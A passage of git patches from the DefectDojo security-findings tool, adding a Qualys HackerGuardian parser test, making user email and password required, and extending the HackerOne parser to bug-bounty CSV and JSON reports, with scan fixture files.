https://data.example.co/wp-content/uploads/2023/08/download.svg Payload: https://data.example.co/feed/download/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/08/download.svg. It was redirected from: https://data.example.co/feed/download/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK url: https://data.example.co/test-flow-shopify-bw/ Payload: https://data.example.co:443/test/ comment: Found this Vulnerability for redirect link: https://data.example.co/test-flow-shopify-bw/. It was redirected from: https://data.example.co:443/test/. Original URL is: https://data.example.co:443/. matched: HTTP/1.1 200 OK url: https://data.example.co/wp-content/uploads/2023/08/users.svg Payload: https://data.example.co/feed/users/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/08/users.svg. It was redirected from: https://data.example.co/feed/users/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK","-","" diff --git a/unittests/scans/qualys_hacker_guardian/one_finding.csv b/unittests/scans/qualys_hacker_guardian/one_finding.csv new file mode 100644 index 00000000000..eaae1d75602 --- /dev/null +++ b/unittests/scans/qualys_hacker_guardian/one_finding.csv @@ -0,0 +1,3 @@ +"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","80","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl url: https://help.example.co/. matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","443","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" diff --git a/unittests/scans/qualys_hacker_guardian/zero_finding.csv b/unittests/scans/qualys_hacker_guardian/zero_finding.csv new file mode 100644 index 00000000000..8171af3c601 --- /dev/null +++ b/unittests/scans/qualys_hacker_guardian/zero_finding.csv @@ -0,0 +1 @@ +"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID" diff --git a/unittests/tools/test_qualys_hacker_guardian_parser.py b/unittests/tools/test_qualys_hacker_guardian_parser.py new file mode 100644 index 00000000000..00ccb64499d --- /dev/null +++ b/unittests/tools/test_qualys_hacker_guardian_parser.py @@ -0,0 +1,46 @@ +from os import path + +from dojo.models import Test +from dojo.tools.qualys_hacker_guardian.parser import QualysHackerGuardianParser +from unittests.dojo_test_case import DojoTestCase + + +class TestQualysHackerGuardianParser(DojoTestCase): + + def test_qualys_hacker_guardian_parser_with_no_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/zero_finding.csv"), encoding="utf-8") as testfile: + parser = QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_qualys_hacker_guardian_parser_with_one_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/one_finding.csv"), encoding="utf-8") as testfile: + parser = QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("Low", finding.severity) + self.assertEqual("Reference to Windows file path is present in HTML", finding.title) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 2) + + def test_qualys_hacker_guardian_parser_with_many_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/many_finding.csv"), encoding="utf-8") as testfile: + parser = QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + finding = findings[0] + self.assertEqual("Low", finding.severity) + self.assertEqual("Reference to Windows file path is present in HTML", finding.title) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 2) + finding = findings[1] + self.assertEqual("HTTP Security Header Not Detected", finding.title) + self.assertEqual("Low", finding.severity) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 1) + finding = findings[2] + self.assertEqual("Predictable Resource Location Via Forced Browsing", finding.title) + self.assertEqual("Low", finding.severity) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 1) From cdee30b8a5b31c4f634ad2d97df275ef0d256109 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:19:46 -0500 Subject: [PATCH 50/62] User: Make email required at all times, password required for new users (#10938) * User: Make email required at all times, password required for new users * fix tests * update tests --- dojo/api_v2/serializers.py | 9 +++++---- dojo/forms.py | 4 +++- tests/user_test.py | 3 +++ unittests/test_apiv2_notifications.py | 1 + unittests/test_apiv2_user.py | 14 ++++++++------ unittests/test_rest_framework.py | 13 ++++++++++++- 6 files changed, 32 insertions(+), 12 deletions(-) diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index a0d4298b740..10c07b3f3d4 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -429,6 +429,7 @@ class Meta: class UserSerializer(serializers.ModelSerializer): date_joined = serializers.DateTimeField(read_only=True) last_login = serializers.DateTimeField(read_only=True, allow_null=True) + email = serializers.EmailField(required=True) password = serializers.CharField( write_only=True, style={"input_type": "password"}, @@ -549,12 +550,12 @@ def validate(self, data): msg = "Only superusers are allowed to add or edit superusers." raise ValidationError(msg) - if ( - self.context["request"].method in ["PATCH", "PUT"] - and "password" in data - ): + if self.context["request"].method in ["PATCH", "PUT"] and "password" in data: msg = "Update of password though API is not allowed" raise ValidationError(msg) + if self.context["request"].method == "POST" and "password" not in data: + msg = "Passwords must be supplied for new users" + raise ValidationError(msg) else: return super().validate(data) diff --git a/dojo/forms.py b/dojo/forms.py index dde58a38b61..fd5c55a7b6a 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -2168,8 +2168,9 @@ def clean(self): class AddDojoUserForm(forms.ModelForm): + email = forms.EmailField(required=True) password = forms.CharField(widget=forms.PasswordInput, - required=False, + required=True, validators=[validate_password], help_text="") @@ -2186,6 +2187,7 @@ def __init__(self, *args, **kwargs): class EditDojoUserForm(forms.ModelForm): + email = forms.EmailField(required=True) class Meta: model = Dojo_User diff --git a/tests/user_test.py b/tests/user_test.py index dcaa9c845f4..607b8a7b4ea 100644 --- a/tests/user_test.py +++ b/tests/user_test.py @@ -59,6 +59,9 @@ def test_create_user_with_writer_global_role(self): # username driver.find_element(By.ID, "id_username").clear() driver.find_element(By.ID, "id_username").send_keys("userWriter") + # password + driver.find_element(By.ID, "id_password").clear() + driver.find_element(By.ID, "id_password").send_keys("Def3ctD0jo&") # First Name driver.find_element(By.ID, "id_first_name").clear() driver.find_element(By.ID, "id_first_name").send_keys("Writer") diff --git a/unittests/test_apiv2_notifications.py b/unittests/test_apiv2_notifications.py index 7149454ebd3..a31b859a76c 100644 --- a/unittests/test_apiv2_notifications.py +++ b/unittests/test_apiv2_notifications.py @@ -33,6 +33,7 @@ def create_test_user(self): password = "testTEST1234!@#$" r = self.client.post(reverse("user-list"), { "username": "api-user-notification", + "email": "admin@dojo.com", "password": password, }, format="json") return r.json()["id"] diff --git a/unittests/test_apiv2_user.py b/unittests/test_apiv2_user.py index 88f91bfb5ff..9b9fe026183 100644 --- a/unittests/test_apiv2_user.py +++ b/unittests/test_apiv2_user.py @@ -26,16 +26,11 @@ def test_user_list(self): self.assertNotIn(item, user, r.content[:1000]) def test_user_add(self): - # simple user without password - r = self.client.post(reverse("user-list"), { - "username": "api-user-1", - }, format="json") - self.assertEqual(r.status_code, 201, r.content[:1000]) - # user with good password password = "testTEST1234!@#$" r = self.client.post(reverse("user-list"), { "username": "api-user-2", + "email": "admin@dojo.com", "password": password, }, format="json") self.assertEqual(r.status_code, 201, r.content[:1000]) @@ -50,6 +45,7 @@ def test_user_add(self): # user with weak password r = self.client.post(reverse("user-list"), { "username": "api-user-3", + "email": "admin@dojo.com", "password": "weakPassword", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) @@ -59,6 +55,8 @@ def test_user_change_password(self): # some user r = self.client.post(reverse("user-list"), { "username": "api-user-4", + "email": "admin@dojo.com", + "password": "testTEST1234!@#$", }, format="json") self.assertEqual(r.status_code, 201, r.content[:1000]) user_id = r.json()["id"] @@ -66,16 +64,19 @@ def test_user_change_password(self): r = self.client.put("{}{}/".format(reverse("user-list"), user_id), { "username": "api-user-4", "first_name": "first", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 200, r.content[:1000]) r = self.client.patch("{}{}/".format(reverse("user-list"), user_id), { "last_name": "last", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 200, r.content[:1000]) r = self.client.put("{}{}/".format(reverse("user-list"), user_id), { "username": "api-user-4", + "email": "admin@dojo.com", "password": "testTEST1234!@#$", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) @@ -83,6 +84,7 @@ def test_user_change_password(self): r = self.client.patch("{}{}/".format(reverse("user-list"), user_id), { "password": "testTEST1234!@#$", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8")) diff --git a/unittests/test_rest_framework.py b/unittests/test_rest_framework.py index aa9318ba8f6..9fe9b1cc5f3 100644 --- a/unittests/test_rest_framework.py +++ b/unittests/test_rest_framework.py @@ -1699,8 +1699,19 @@ def __init__(self, *args, **kwargs): self.deleted_objects = 25 BaseClass.RESTEndpointTest.__init__(self, *args, **kwargs) + def test_create(self): + payload = self.payload.copy() | { + "password": "testTEST1234!@#$", + } + length = self.endpoint_model.objects.count() + response = self.client.post(self.url, payload) + self.assertEqual(201, response.status_code, response.content[:1000]) + self.assertEqual(self.endpoint_model.objects.count(), length + 1) + def test_create_user_with_non_configuration_permissions(self): - payload = self.payload.copy() + payload = self.payload.copy() | { + "password": "testTEST1234!@#$", + } payload["configuration_permissions"] = [25, 26] # these permissions exist but user can not assign them becaause they are not "configuration_permissions" response = self.client.post(self.url, payload) self.assertEqual(response.status_code, 400) From ad7939d43ab93f3b9177b0e278b5aed4ca332208 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 21:02:18 -0500 Subject: [PATCH 51/62] Hacker One Parser: Add support for Bug Bounty Program reports (#10939) * Restructure parser for extendability * Support for bug bounty reports * Correct ruff --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 1 + dojo/tools/h1/parser.py | 245 ++++++++++++++---- unittests/scans/h1/bug_bounty_many.csv | 5 + unittests/scans/h1/bug_bounty_many.json | 116 +++++++++ unittests/scans/h1/bug_bounty_one.csv | 2 + unittests/scans/h1/bug_bounty_one.json | 32 +++ unittests/scans/h1/bug_bounty_zero.csv | 1 + unittests/scans/h1/bug_bounty_zero.json | 3 + ...ta_many.json => vuln_disclosure_many.json} | 0 ...data_one.json => vuln_disclosure_one.json} | 0 ...a_empty.json => vuln_disclosure_zero.json} | 0 unittests/tools/test_h1_parser.py | 160 +++++++++++- 13 files changed, 513 insertions(+), 54 deletions(-) create mode 100644 unittests/scans/h1/bug_bounty_many.csv create mode 100644 unittests/scans/h1/bug_bounty_many.json create mode 100644 unittests/scans/h1/bug_bounty_one.csv create mode 100644 unittests/scans/h1/bug_bounty_one.json create mode 100644 unittests/scans/h1/bug_bounty_zero.csv create mode 100644 unittests/scans/h1/bug_bounty_zero.json rename unittests/scans/h1/{data_many.json => vuln_disclosure_many.json} (100%) rename unittests/scans/h1/{data_one.json => vuln_disclosure_one.json} (100%) rename unittests/scans/h1/{data_empty.json => vuln_disclosure_zero.json} (100%) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 5dfa946a6c2..f8adf9d7d4e 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -b330f7dbd92c2df5a2a0632befc9775bef4a1c62b90375aa511957ebcd0ea82a +f7e63afa0003d1992f8247f9a7a830847bd7498fa1e2d46d6ea04e3006bb9ee2 diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index d96733ca8ff..348596ef75b 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1280,6 +1280,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], "Invicti Scan": ["title", "description", "severity"], + "HackerOne Cases": ["title", "severity"], "KrakenD Audit Scan": ["description", "mitigation", "severity"], } diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py index 457e01c06f5..e182af6b762 100644 --- a/dojo/tools/h1/parser.py +++ b/dojo/tools/h1/parser.py @@ -1,44 +1,36 @@ +import csv import hashlib +import io import json +from contextlib import suppress from datetime import datetime +from typing import ClassVar -from dojo.models import Finding +from dateutil import parser as date_parser +from django.core.files.uploadedfile import TemporaryUploadedFile + +from dojo.models import Finding, Test __author__ = "Kirill Gotsman" -class H1Parser: +class HackerOneVulnerabilityDisclosureProgram: """ - A class that can be used to parse the Get All Reports JSON export from HackerOne API. + Vulnerability Disclosure Program HackerOne reports """ - def get_scan_types(self): - return ["HackerOne Cases"] - - def get_label_for_scan_types(self, scan_type): - return scan_type - - def get_description_for_scan_types(self, scan_type): - return "Import HackerOne cases findings in JSON format." - - def get_findings(self, file, test): + def get_vulnerability_disclosure_json_findings(self, tree, test): """ Converts a HackerOne reports to a DefectDojo finding """ - - # Load the contents of the JSON file into a dictionary - data = file.read() - try: - tree = json.loads(str(data, "utf-8")) - except Exception: - tree = json.loads(data) # Convert JSON report to DefectDojo format dupes = {} for content in tree["data"]: # Get all relevant data date = content["attributes"]["created_at"] date = datetime.strftime( - datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), "%Y-%m-%d", + datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), + "%Y-%m-%d", ) # Build the title of the Dojo finding title = "#" + content["id"] + " " + content["attributes"]["title"] @@ -47,21 +39,15 @@ def get_findings(self, file, test): # References try: - issue_tracker_id = content["attributes"][ - "issue_tracker_reference_id" - ] - issue_tracker_url = content["attributes"][ - "issue_tracker_reference_url" - ] + issue_tracker_id = content["attributes"]["issue_tracker_reference_id"] + issue_tracker_url = content["attributes"]["issue_tracker_reference_url"] references = f"[{issue_tracker_id}]({issue_tracker_url})\n" except Exception: references = "" # Build the severity of the Dojo finding try: - severity = content["relationships"]["severity"]["data"][ - "attributes" - ]["rating"].capitalize() + severity = content["relationships"]["severity"]["data"]["attributes"]["rating"].capitalize() if severity not in ["Low", "Medium", "High", "Critical"]: severity = "Info" except Exception: @@ -81,9 +67,7 @@ def get_findings(self, file, test): # Set CWE of the Dojo finding try: cwe = int( - content["relationships"]["weakness"]["data"]["attributes"][ - "external_id" - ][4:], + content["relationships"]["weakness"]["data"]["attributes"]["external_id"][4:], ) except Exception: cwe = 0 @@ -121,11 +105,10 @@ def get_findings(self, file, test): def build_description(self, content): date = content["attributes"]["created_at"] date = datetime.strftime( - datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), "%Y-%m-%d", + datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ"), + "%Y-%m-%d", ) - reporter = content["relationships"]["reporter"]["data"]["attributes"][ - "username" - ] + reporter = content["relationships"]["reporter"]["data"]["attributes"]["username"] triaged_date = content["attributes"]["triaged_at"] # Build the description of the Dojo finding @@ -142,9 +125,7 @@ def build_description(self, content): # Try to grab CVSS try: - cvss = content["relationships"]["severity"]["data"]["attributes"][ - "score" - ] + cvss = content["relationships"]["severity"]["data"]["attributes"]["score"] description += f"CVSS: {cvss}\n" except Exception: pass @@ -156,14 +137,186 @@ def build_description(self, content): # Try to grab weakness if it's there try: - weakness_title = content["relationships"]["weakness"]["data"][ - "attributes" - ]["name"] - weakness_desc = content["relationships"]["weakness"]["data"][ - "attributes" - ]["description"] + weakness_title = content["relationships"]["weakness"]["data"]["attributes"]["name"] + weakness_desc = content["relationships"]["weakness"]["data"]["attributes"]["description"] description += f"\n##Weakness: {weakness_title}\n{weakness_desc}" except Exception: pass return description + + +class HackerOneBugBountyProgram: + """Bug Bounty Program HackerOne reports.""" + + fields_to_label: ClassVar[dict[str, str]] = { + "id": "ID", + "weakness": "Weakness Category", + "substate": "Substate", + "reporter": "Reporter", + "assigned": "Assigned To", + "public": "Public", + "triageted_at": "Triaged On", + "closed_at": "Closed On", + "awarded_at": "Awarded On", + "bounty": "Bounty Price", + "bonus": "Bonus", + "first_response_at": "First Response On", + "source": "Source", + "reference": "Reference", + "reference_url": "Reference URL", + "structured_scope": "Structured Scope", + "structured_scope_reference": "Structured Scope Reference", + "original_report_id": "Original Report ID", + "collaborating_users": "Collaboration Users", + "duplicate_report_ids": "Duplicate Report IDs", + } + + def get_bug_bounty_program_json_findings(self, dict_list: dict, test: Test) -> list[Finding]: + return self.parse_findings(dict_list, test) + + def get_bug_bounty_program_csv_findings(self, dict_list: dict, test: Test) -> list[Finding]: + return self.parse_findings(dict_list, test) + + def parse_findings(self, dict_list: list[dict], test: Test) -> list[Finding]: + """Return a list of findings generated by the submitted report.""" + findings = [] + for entry in dict_list: + status_dict = self.determine_status(entry) + finding = Finding( + title=entry.get("title"), + severity=self.convert_severity(entry), + description=self.parse_description(entry), + date=date_parser.parse(entry.get("reported_at")), + dynamic_finding=True, + test=test, + **status_dict, + ) + # Add vulnerability IDs if they are present + if (cve_str := entry.get("cve_ids")) is not None and len(cve_str) > 0: + finding.unsaved_vulnerability_ids = [cve_str] + # Add the finding the the list + findings.append(finding) + return findings + + def determine_status(self, row) -> dict: + """Generate a dict of status meta to fully represent that state of the finding + + Possible states currently supported are open and closed. In the event that neither + of those options are present, the open status will be the default, and returned + """ + default_status = { + "active": True, + } + # Open status -> active = True + # Closed status -> is_mitigated = True + timestamp + if (status := row.get("state")) is not None: + if status == "open": + return default_status + if status == "closed": + return { + "is_mitigated": True, + "active": False, + "mitigated": date_parser.parse(row.get("closed_at")), + } + return default_status + + def convert_severity(self, entry: dict) -> str: + """Convert the severity from the parser from the string value, or CVSS score.""" + # Try to use the string severity first + if (severity := entry.get("severity_rating")) is not None: + if severity in ["critical", "high", "medium", "low"]: + return severity.capitalize() + # Fall back to "severity_score" which I assume is CVSS Score + if (severity_score := entry.get("severity_score")) is not None: + with suppress(ValueError): + severity_score = float(severity_score) + if severity_score >= 9.0: + return "Critical" + if severity_score >= 7.0: + return "High" + if severity_score >= 4.0: + return "Medium" + if severity_score > 0.0: + return "Low" + # Default to Info in all cases (assuming we reach this) + return "Info" + + def parse_description(self, entry: dict) -> str: + """Build the description from the mapping set in the fields_to_label var.""" + # Iterate over the items and build the string + description = "" + for field, label in self.fields_to_label.items(): + if (value := entry.get(field)) is not None and len(value) > 0: + description += f"**{label}**: {value}\n" + return description + + +class H1Parser( + HackerOneVulnerabilityDisclosureProgram, + HackerOneBugBountyProgram, +): + """ + A class that can be used to parse the Get All Reports JSON export from HackerOne API. + """ + + def get_scan_types(self): + return ["HackerOne Cases"] + + def get_label_for_scan_types(self, scan_type): + return scan_type + + def get_description_for_scan_types(self, scan_type): + return "Import HackerOne cases findings in JSON format." + + def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]: + """Return the list of findings generated from the uploaded report.""" + # first determine which format to pase + file_name = file.name + if str(file_name).endswith(".json"): + return self.determine_json_format(file, test) + elif str(file_name).endswith(".csv"): + return self.determine_csv_format(file, test) + else: + msg = "Filename extension not recognized. Use .json or .csv" + raise ValueError(msg) + + def get_json_tree(self, file: TemporaryUploadedFile) -> dict: + """Extract the CSV file into a iterable that represents a dict.""" + data = file.read() + try: + tree = json.loads(str(data, "utf-8")) + except Exception: + tree = json.loads(data) + return tree + + def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]: + """Evaluate the format of the JSON report that was uploaded to determine which parser to use.""" + tree = self.get_json_tree(file) + # Check for some root elements + if "findings" in tree: + return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test) + if "data" in tree: + return self.get_vulnerability_disclosure_json_findings(tree, test) + else: + msg = "This JSON format is not supported" + raise ValueError(msg) + + def get_csv_reader(self, file: TemporaryUploadedFile) -> csv.DictReader: + """Extract the CSV file into a iterable that represents a dict.""" + if file is None: + return () + content = file.read() + if isinstance(content, bytes): + content = content.decode("utf-8") + return csv.DictReader(io.StringIO(content), delimiter=",", quotechar='"') + + def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]: + """Evaluate the format of the CSV report that was uploaded to determine which parser to use.""" + reader = self.get_csv_reader(file) + # Check for some root elements + if "bounty" in reader.fieldnames: + return self.get_bug_bounty_program_csv_findings(reader, test) + else: + msg = "This CSV format is not supported" + raise ValueError(msg) diff --git a/unittests/scans/h1/bug_bounty_many.csv b/unittests/scans/h1/bug_bounty_many.csv new file mode 100644 index 00000000000..a6bc207d64b --- /dev/null +++ b/unittests/scans/h1/bug_bounty_many.csv @@ -0,0 +1,5 @@ +id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids +2501687,Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration,medium,,open,triaged,Information Disclosure,2024-05-12 04:05:27 UTC,2024-05-14 22:14:16 UTC,2024-08-28 19:35:16 UTC,,2024-08-28 19:40:24 UTC,Group example.co Team,reporter,,400.0,,no,,,1489537348,,,"",, +2710467,Acceso no autorizado a soporte premium sin pagar,critical,9.1,open,new,,2024-09-10 15:38:20 UTC,,,,,,reporter,,,,no,,,example.co,,,"",, +2682608,XSS - stg.pse.mock.example.co,none,0.0,closed,duplicate,,2024-08-25 07:27:18 UTC,2024-08-27 18:19:23 UTC,,2024-08-27 18:19:23 UTC,,,reporter,,,,no,,,,,2311675,"",, +2616856,example.co/File creation via HTTP method PUT,critical,,closed,duplicate,,2024-07-22 17:54:36 UTC,2024-07-22 20:57:56 UTC,,2024-07-22 20:57:56 UTC,,,reporter,,,,no,,,example.co,,2597854,CVE-2017-12615,, diff --git a/unittests/scans/h1/bug_bounty_many.json b/unittests/scans/h1/bug_bounty_many.json new file mode 100644 index 00000000000..ba3b7e3eb14 --- /dev/null +++ b/unittests/scans/h1/bug_bounty_many.json @@ -0,0 +1,116 @@ +{ + "findings": [ + { + "id": "2501687", + "title": "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + "severity_rating": "medium", + "severity_score": "", + "state": "open", + "substate": "triaged", + "weakness": "Information Disclosure", + "reported_at": "2024-05-12 04:05:27 UTC", + "first_response_at": "2024-05-14 22:14:16 UTC", + "triaged_at": "2024-08-28 19:35:16 UTC", + "closed_at": "", + "awarded_at": "2024-08-28 19:40:24 UTC", + "assigned": "Group example.co Team", + "reporter": "reporter", + "source": "", + "bounty": "400.0", + "bonus": "", + "public": "no", + "reference": "", + "reference_url": "", + "structured_scope": "1489537348", + "structured_scope_reference": "", + "original_report_id": "", + "cve_ids": "", + "collaborating_users": "", + "duplicate_report_ids": "" + }, + { + "id": "2710467", + "title": "Acceso no autorizado a soporte premium sin pagar", + "severity_rating": "critical", + "severity_score": "9.1", + "state": "open", + "substate": "new", + "weakness": "", + "reported_at": "2024-09-10 15:38:20 UTC", + "first_response_at": "", + "triaged_at": "", + "closed_at": "", + "awarded_at": "", + "assigned": "", + "reporter": "reporter", + "source": "", + "bounty": "", + "bonus": "", + "public": "no", + "reference": "", + "reference_url": "", + "structured_scope": "example.co", + "structured_scope_reference": "", + "original_report_id": "", + "cve_ids": "", + "collaborating_users": "", + "duplicate_report_ids": "" + }, + { + "id": "2682608", + "title": "XSS - stg.pse.mock.example.co", + "severity_rating": "none", + "severity_score": "0.0", + "state": "closed", + "substate": "duplicate", + "weakness": "", + "reported_at": "2024-08-25 07:27:18 UTC", + "first_response_at": "2024-08-27 18:19:23 UTC", + "triaged_at": "", + "closed_at": "2024-08-27 18:19:23 UTC", + "awarded_at": "", + "assigned": "", + "reporter": "reporter", + "source": "", + "bounty": "", + "bonus": "", + "public": "no", + "reference": "", + "reference_url": "", + "structured_scope": "", + "structured_scope_reference": "", + "original_report_id": "2311675", + "cve_ids": "", + "collaborating_users": "", + "duplicate_report_ids": "" + }, + { + "id": "2616856", + "title": "example.co/File creation via HTTP method PUT", + "severity_rating": "critical", + "severity_score": "", + "state": "closed", + "substate": "duplicate", + "weakness": "", + "reported_at": "2024-07-22 17:54:36 UTC", + "first_response_at": "2024-07-22 20:57:56 UTC", + "triaged_at": "", + "closed_at": "2024-07-22 20:57:56 UTC", + "awarded_at": "", + "assigned": "", + "reporter": "reporter", + "source": "", + "bounty": "", + "bonus": "", + "public": "no", + "reference": "", + "reference_url": "", + "structured_scope": "example.co", + "structured_scope_reference": "", + "original_report_id": "2597854", + "cve_ids": "CVE-2017-12615", + "collaborating_users": "", + "duplicate_report_ids": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/h1/bug_bounty_one.csv b/unittests/scans/h1/bug_bounty_one.csv new file mode 100644 index 00000000000..7b13f4fdc0f --- /dev/null +++ b/unittests/scans/h1/bug_bounty_one.csv @@ -0,0 +1,2 @@ +id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids +2501687,Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration,medium,,open,triaged,Information Disclosure,2024-05-12 04:05:27 UTC,2024-05-14 22:14:16 UTC,2024-08-28 19:35:16 UTC,,2024-08-28 19:40:24 UTC,Group example.co Team,reporter,,400.0,,no,,,1489537348,,,"",, diff --git a/unittests/scans/h1/bug_bounty_one.json b/unittests/scans/h1/bug_bounty_one.json new file mode 100644 index 00000000000..e70e6932eae --- /dev/null +++ b/unittests/scans/h1/bug_bounty_one.json @@ -0,0 +1,32 @@ +{ + "findings": [ + { + "id": "2501687", + "title": "Sensitive Account Balance Information Exposure via example's DaviPlata Payment Link Integration", + "severity_rating": "medium", + "severity_score": "", + "state": "open", + "substate": "triaged", + "weakness": "Information Disclosure", + "reported_at": "2024-05-12 04:05:27 UTC", + "first_response_at": "2024-05-14 22:14:16 UTC", + "triaged_at": "2024-08-28 19:35:16 UTC", + "closed_at": "", + "awarded_at": "2024-08-28 19:40:24 UTC", + "assigned": "Group example.co Team", + "reporter": "reporter", + "source": "", + "bounty": "400.0", + "bonus": "", + "public": "no", + "reference": "", + "reference_url": "", + "structured_scope": "1489537348", + "structured_scope_reference": "", + "original_report_id": "", + "cve_ids": "", + "collaborating_users": "", + "duplicate_report_ids": "" + } + ] +} \ No newline at end of file diff --git a/unittests/scans/h1/bug_bounty_zero.csv b/unittests/scans/h1/bug_bounty_zero.csv new file mode 100644 index 00000000000..2d388b1293f --- /dev/null +++ b/unittests/scans/h1/bug_bounty_zero.csv @@ -0,0 +1 @@ +id,title,severity_rating,severity_score,state,substate,weakness,reported_at,first_response_at,triaged_at,closed_at,awarded_at,assigned,reporter,source,bounty,bonus,public,reference,reference_url,structured_scope,structured_scope_reference,original_report_id,cve_ids,collaborating_users,duplicate_report_ids diff --git a/unittests/scans/h1/bug_bounty_zero.json b/unittests/scans/h1/bug_bounty_zero.json new file mode 100644 index 00000000000..b8046d01053 --- /dev/null +++ b/unittests/scans/h1/bug_bounty_zero.json @@ -0,0 +1,3 @@ +{ + "findings": [] +} \ No 